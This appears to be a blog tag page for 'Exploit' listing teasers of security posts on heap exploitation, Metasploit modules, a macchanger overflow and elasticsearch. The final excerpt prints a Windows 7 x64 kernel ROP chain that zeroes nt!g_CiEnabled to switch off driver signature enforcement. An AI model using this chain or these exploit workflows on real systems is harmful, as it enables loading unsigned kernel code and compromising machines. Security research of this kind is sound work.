Tags » Exploit

Hackers Target Video Game Makers

Here’s a great article about how some Hackers are targeting video game makers to give the game away for free and to outscore their opponents. Good read. 6 more words


x86 Exploitation 101: this is the first witchy house

So, history goes on with Phantasmal Phantasmagoria publishing a groundbreaking article in 2005 (right after the one-line-of-code unlink fix) called Malloc Maleficarum proposing five new ways of attacking the Linux heap implementation. 3,103 more words


Add new exploits to Metasploit from Exploit-db

All this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not the updated ones. 1,283 more words

Ethical Hacking

GNU macchanger <= 1.6.0 Heap Buffer Overflow

I was poking around the GNU macchanger source code the other day for fun and happened across this little gem.  Unfortunately modern heap-corruption protections render it unexpoitable (to the best of my knowledge), and even then, you would only be able to gain the privileges of the current user.  973 more words


Stretching elasticsearch

This week I had to look into elasticsearch. Simply put, it is a search engine with a simple to use interface. Interface as in REST API, I mean. 612 more words


ROP for Windows 7 x64 to bypass Code Integrity from vulnerable DriverEntry

RET instructions are omitted

;; NT Kernel ROP chain to bypass Code Integrity on Windows 7 x64 SP1 from IopLoadDriver
;; ntoskrnl.exe
;; 6.1.7601.18409  
pop           rax                  ; rsp + 10  ; skip this gets replaced
pop           rax                  ; rsp + 20  ; nt!g_CiEnabled
mov byte ptr , 0              ; rsp + 28  ; nt!g_CiEnabled = 0
pop           rax                  ; rsp + 38  ; align stack     
pop           rax                  ; rsp + 48  ; align stack
xor           eax, eax             ; rsp + 50  ; STATUS_SUCCESS
add           rsp, 240h            ; rsp + 290 ; epilogue
pop           r15
pop           r14
pop           r13
pop           r12
pop           rdi
pop           rsi
pop           rbp
retn                               ; return to IopLoadUnloadDriver